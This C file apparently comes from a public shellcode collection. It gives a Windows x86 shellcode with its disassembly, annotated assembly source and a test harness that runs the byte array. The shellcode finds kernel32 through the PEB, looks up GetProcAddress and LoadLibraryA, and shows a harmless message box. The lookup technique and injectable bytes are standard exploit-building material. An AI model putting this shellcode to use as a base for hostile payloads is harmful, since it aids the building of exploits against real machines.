/*
# Title : Windows x86 MessageBoxA shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 14-08-2016
# Tested On : Windows 7 starter x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 31 db xor %ebx,%ebx
14: 8b 59 3c mov 0x3c(%ecx),%ebx
17: 01 cb add %ecx,%ebx
19: 8b 5b 78 mov 0x78(%ebx),%ebx
1c: 01 cb add %ecx,%ebx
1e: 8b 73 20 mov 0x20(%ebx),%esi
21: 01 ce add %ecx,%esi
23: 31 d2 xor %edx,%edx
00000025 <g>:
25: 42 inc %edx
26: ad lods %ds:(%esi),%eax
27: 01 c8 add %ecx,%eax
29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2f: 75 f4 jne 25 <g>
31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
38: 75 eb jne 25 <g>
3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
41: 75 e2 jne 25 <g>
43: 8b 73 1c mov 0x1c(%ebx),%esi
46: 01 ce add %ecx,%esi
48: 8b 14 96 mov (%esi,%edx,4),%edx
4b: 01 ca add %ecx,%edx
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 db xor %ebx,%ebx
53: 53 push %ebx
54: 68 61 72 79 41 push $0x41797261
59: 68 4c 69 62 72 push $0x7262694c
5e: 68 4c 6f 61 64 push $0x64616f4c
63: 54 push %esp
64: 51 push %ecx
65: ff d2 call *%edx
67: 83 c4 10 add $0x10,%esp
6a: 31 c9 xor %ecx,%ecx
6c: 68 6c 6c 42 42 push $0x42426c6c
71: 88 4c 24 02 mov %cl,0x2(%esp)
75: 68 33 32 2e 64 push $0x642e3233
7a: 68 75 73 65 72 push $0x72657375
7f: 54 push %esp
80: ff d0 call *%eax
82: 83 c4 0c add $0xc,%esp
85: 31 c9 xor %ecx,%ecx
87: 68 6f 78 41 42 push $0x4241786f
8c: 88 4c 24 03 mov %cl,0x3(%esp)
90: 68 61 67 65 42 push $0x42656761
95: 68 4d 65 73 73 push $0x7373654d
9a: 54 push %esp
9b: 50 push %eax
9c: ff d6 call *%esi
9e: 83 c4 0c add $0xc,%esp
a1: 31 d2 xor %edx,%edx
a3: 31 c9 xor %ecx,%ecx
a5: 52 push %edx
a6: 68 73 67 21 21 push $0x21216773
ab: 68 6c 65 20 6d push $0x6d20656c
b0: 68 53 61 6d 70 push $0x706d6153
b5: 8d 14 24 lea (%esp),%edx
b8: 51 push %ecx
b9: 68 68 65 72 65 push $0x65726568
be: 68 68 69 20 54 push $0x54206968
c3: 8d 0c 24 lea (%esp),%ecx
c6: 31 db xor %ebx,%ebx
c8: 43 inc %ebx
c9: 53 push %ebx
ca: 52 push %edx
cb: 51 push %ecx
cc: 31 db xor %ebx,%ebx
ce: 53 push %ebx
cf: ff d0 call *%eax
d1: 31 c9 xor %ecx,%ecx
d3: 68 65 73 73 41 push $0x41737365
d8: 88 4c 24 03 mov %cl,0x3(%esp)
dc: 68 50 72 6f 63 push $0x636f7250
e1: 68 45 78 69 74 push $0x74697845
e6: 8d 0c 24 lea (%esp),%ecx
e9: 51 push %ecx
ea: 57 push %edi
eb: ff d6 call *%esi
ed: 31 c9 xor %ecx,%ecx
ef: 51 push %ecx
f0: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32 base address
xor ebx,ebx
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;--------------------------------------------------
xor edx,edx
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
;-----------------------------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
;---------------------------------
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
;------------------
mov esi,edx
mov edi,ecx
;--------------------
;finding address of LoadLibraryA()
xor ebx,ebx
push ebx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ecx
call edx
add esp,16
;---------------------------
xor ecx,ecx
;LoadLibraryA("user32.dll")
push 0x42426c6c
mov [esp+2],byte cl
push 0x642e3233
push 0x72657375
push esp
call eax
;-------------------------
;Finding address of MessageBoxA()
add esp,12
xor ecx,ecx
push 0x4241786f
mov [esp+3],byte cl
push 0x42656761
push 0x7373654d
push esp
push eax
call esi
;---------------------------------
add esp,12
;----------------
;MessageBoxA(NULL,"Sample msg!!","hi There",1)
xor edx,edx
xor ecx,ecx
push edx
push 0x21216773
push 0x6d20656c
push 0x706d6153
lea edx,[esp] ; "Sample msg!!"
push ecx
push 0x65726568
push 0x54206968
lea ecx,[esp] ; "hi There"
xor ebx,ebx
inc ebx
push ebx
push edx
push ecx
xor ebx,ebx
push ebx
call eax
;----------------------
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
lea ecx,[esp]
push ecx
push edi
call esi
;---------------
xor ecx,ecx
push ecx
call eax
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
